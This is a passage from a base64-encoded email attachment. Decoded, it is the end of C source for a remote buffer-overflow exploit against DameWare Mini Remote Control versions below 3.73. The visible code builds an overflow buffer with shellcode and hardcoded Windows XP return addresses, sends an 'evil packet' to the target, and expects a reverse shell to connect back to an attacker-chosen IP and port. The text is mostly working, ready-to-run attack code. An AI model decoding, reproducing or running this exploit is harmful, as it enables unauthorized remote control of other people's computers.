JmJ1ZmZlcls1MjBdLHNoZWxsYzBkZSxzaXplb2Yoc2hlbGxjMGRlKSk7DQoJc3RyY3B5KCZidWZm
ZXJbMTIwMF0sV0lOSE9TVCk7c3RyY3B5KCZidWZmZXJbOTc1XSxVU0VSUFJPRklMRV9OQU1FKTsN
CglzdHJjcHkoJmJ1ZmZlclsxMjk1XSxVU0VSUFJPRklMRV9DT01QQU5ZKTtzdHJjcHkoJmJ1ZmZl
clsxNDk1XSxVU0VSUFJPRklMRV9MSUNFTlNFKTsNCglzdHJjcHkoJmJ1ZmZlclsxNzU1XSxVU0VS
UFJPRklMRV9EQVRFKTtzdHJjcHkoJmJ1ZmZlclsyMDE1XSxXSU5IT1NUKTsNCglzdHJjcHkoJmJ1
ZmZlclsyMjc1XSxJTlRFUkZBQ0VfSVApO3N0cmNweSgmYnVmZmVyWzI1MzVdLFdJTkRPTUFJTik7
DQoJc3RyY3B5KCZidWZmZXJbMjc5NV0sQ0xJRU5UX1ZFUlNJT04pOw0KDQoJcHJpbnRmKCJbK10g
U2VuZGluZyBldmlsICUtMzBzICAuLi4iLCJwYWNrZXQiKTsNCglzZW5kKHNvY2ssYnVmZmVyLFNJ
WkVPRiwwKTsNCgltZW1zZXQoYnVmZmVyLDAsU0laRU9GKTsNCglzaXplPXJlY3Yoc29jayxidWZm
ZXIsU0laRU9GLDApOw0KDQoJaWYoYnVmZmVyWzBdIT0weDMyfHxidWZmZXJbMV0hPTB4MTEpIHsN
CgkJcHJpbnRmKCJQYXRjaGVkXHJcbiIpOw0KCQlyZXR1cm4gLTE7DQoJfQ0KCXByaW50ZigiRG9u
ZVxyXG4iKTsNCglwcmludGYoIltpXSBTaGVsbCBzaG91bGQgYmUgYXJyaXZlZCBhdCAlczolZFxy
XG4iLHJob3N0LHJwb3J0KTsNCglyZXR1cm4gMDsNCn0NCg0Kdm9pZCBiYW5uZXIodm9pZCkNCnsN
CglwcmludGYoIlxyXG4gIFtDcnB0XSBEYW1lV2FyZSBNaW5pIFJlbW90ZSBDb250cm9sIDwgdjMu
NzMgcmVtb3RlIGV4cGxvaXQgYnkga3JhbG9yIFtDcnB0XVxyXG4iKTsNCglwcmludGYoIlx0XHQg
IHd3dy5jb3JvbXB1dGVyLm5ldCAmJiB1bmRlcm5ldCAjY29yb21wdXRlclxyXG5cclxuIik7DQoJ
cmV0dXJuOw0KfQ0Kdm9pZCBzeW50YXgoY2hhciAqcHJvZykNCnsNCglwcmludGYoInN5bnRheDog
JXMgPGhvc3Q+IDx5b3VyX2lwPiA8eW91cl9wb3J0PiBbd2luWFAgdmFyaWFudF1cclxuIixwcm9n
KTsNCglwcmludGYoIndpblhQIHZhcmlhbnRlOlxyXG4iKTsNCglwcmludGYoIiAgICAgICAgICAg
ICAgIDAgd2lsbCB1c2UgMHg3NzM2ZDUwNyBhcyBlaXAgW2ZvdW5kIG9uIG1hbnkgWFBzXVtkZWZh
dWx0XVxyXG4iKTsNCglwcmludGYoIiAgICAgICAgICAgICAgIDEgd2lsbCB1c2UgMHg3NzM1MWNj
MSBhcyBlaXAgW2ZvdW5kIG9uIG1hbnkgWFBzXVxyXG4iKTsNCglwcmludGYoIiAgICAgICAgICAg
ICAgIDIgd2lsbCB1c2UgMHg3NzM5MWNjMSBhcyBlaXAgW2ZvdW5kIG9uIG9uZSBYUCBzcDBdXHJc
biIpOw0KCXJldHVybjsNCn0NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQoJ
V1NBREFUQSB3c2FEYXRhOw0KCWludCBzb2NrLHZhcj0wOw0KDQoJYmFubmVyKCk7DQoJaWYoYXJn
Yzw0fHxhcmdjPjUpIHsNCgkJc3ludGF4KGFyZ3ZbMF0pOw0KCQlyZXR1cm4gLTE7DQoJCX0NCmlm
KGFyZ2M9PTUpIHsNCgl2YXI9YXRvaShhcmd2WzRdKTsNCglpZih2YXI+Mnx8dmFyPDApIHsNCgkJ
c3ludGF4KGFyZ3ZbMF0pOw0KCQlyZXR1cm4gLTE7DQoJCX0NCgl9DQppZihXU0FTdGFydHVwKDB4
MDEwMSwmd3NhRGF0YSkhPTApIHsNCglwcmludGYoImVycm9yOiB1bmFibGUgdG8gbG9hZCB3aW5z
b2NrXHJcbiIpOw0KCXJldHVybiAtMTsNCgl9DQoJc29jaz1jbngoYXJndlsxXSk7DQppZighc29j
aykNCglyZXR1cm4gLTE7DQoJc3RhcnRfYXV0aChzb2NrLGFyZ3ZbMl0sYXRvaShhcmd2WzNdKSx2
YXIpOw0KCXJldHVybiAwOw0KfQ0K
------=_20040110193158_35264--
